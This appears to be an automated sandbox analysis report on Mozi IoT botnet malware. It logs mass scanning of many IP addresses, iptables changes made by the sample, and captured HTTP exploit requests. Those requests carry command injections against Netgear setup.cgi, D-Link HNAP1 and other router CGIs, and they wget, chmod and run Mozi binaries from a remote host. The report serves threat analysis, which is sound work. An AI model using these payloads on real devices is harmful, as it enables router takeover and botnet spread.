Source: global traffic	TCP traffic: 192.168.2.20:52066 -> 65.70.118.43:8080
Source: global traffic	TCP traffic: 192.168.2.20:45870 -> 188.24.124.134:49152
Source: global traffic	TCP traffic: 192.168.2.20:60646 -> 166.82.7.224:7574
Source: global traffic	TCP traffic: 192.168.2.20:42804 -> 217.94.12.32:81
Source: global traffic	TCP traffic: 192.168.2.20:45324 -> 31.15.157.79:8080
Source: global traffic	TCP traffic: 192.168.2.20:37168 -> 167.68.166.142:8080
Source: global traffic	TCP traffic: 192.168.2.20:44994 -> 179.125.55.171:49152
Source: global traffic	TCP traffic: 192.168.2.20:53832 -> 212.136.201.1:8080
Source: global traffic	TCP traffic: 192.168.2.20:54182 -> 88.151.118.122:49152
Source: global traffic	TCP traffic: 192.168.2.20:55594 -> 20.188.249.215:5555
Source: global traffic	TCP traffic: 192.168.2.20:51284 -> 29.173.93.82:5555
Source: global traffic	TCP traffic: 192.168.2.20:53790 -> 41.225.3.47:8080
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 53.150.184.227:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 66.51.200.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 181.150.246.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 86.87.169.9:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 135.159.46.50:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 81.122.5.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 101.175.97.186:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 201.16.210.127:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 150.231.221.134:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 165.27.212.212:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 35.145.36.100:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 184.123.210.115:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 84.139.204.146:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 210.20.165.119:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 90.245.89.183:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 102.40.194.39:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 117.110.44.183:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.84.203.177:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 145.127.164.51:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.60.191.99:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 46.92.49.206:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 90.60.92.48:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 164.125.182.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 210.11.149.99:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 68.213.132.158:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 206.141.207.185:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 37.36.151.108:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 99.148.128.207:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 188.2.194.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 27.247.199.146:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 148.17.145.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 145.224.134.187:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 17.179.66.133:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 94.136.154.153:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 195.153.115.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 82.26.125.94:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 148.166.250.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 73.60.149.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 73.38.107.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 46.69.94.69:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 206.45.246.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 89.207.33.190:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 211.121.235.206:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 81.181.240.162:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 37.141.143.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 37.126.181.96:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 111.71.34.120:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.70.240.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 71.90.204.120:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 169.164.54.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:32898 -> 54.217.177.252:8080
Source: global traffic	TCP traffic: 192.168.2.20:51920 -> 91.128.122.128:7574
Source: global traffic	TCP traffic: 192.168.2.20:54630 -> 83.158.11.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:50738 -> 219.170.242.188:37215
Source: global traffic	TCP traffic: 192.168.2.20:39524 -> 79.209.77.202:49152
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.201.188.204:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 166.40.116.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 118.148.44.14:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 5.203.164.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 162.139.86.71:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.174.66.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 166.38.89.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 120.0.30.153:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 178.137.1.177:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 69.68.118.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 92.154.174.188:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 184.171.204.218:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 59.250.162.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 182.82.125.53:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.36.221.166:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 80.18.245.185:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 200.141.44.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.229.39.239:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 102.53.0.243:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 27.3.146.85:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 36.170.191.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.78.202.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 201.198.23.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 179.131.194.114:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 86.67.177.59:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 13.100.254.46:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 158.118.208.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 130.221.150.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 177.168.241.5:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 12.59.131.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 67.52.33.137:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.64.40.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 104.126.166.232:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 57.181.135.64:2323
Source: global traffic	TCP traffic: 192.168.2.20:45494 -> 82.194.132.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 153.71.86.60:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 89.62.41.91:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 166.24.116.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 91.80.195.73:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 158.233.4.149:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 66.162.164.85:2323

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4638)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 184.86.117.97:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 210.190.146.92:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 49.44.132.19:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
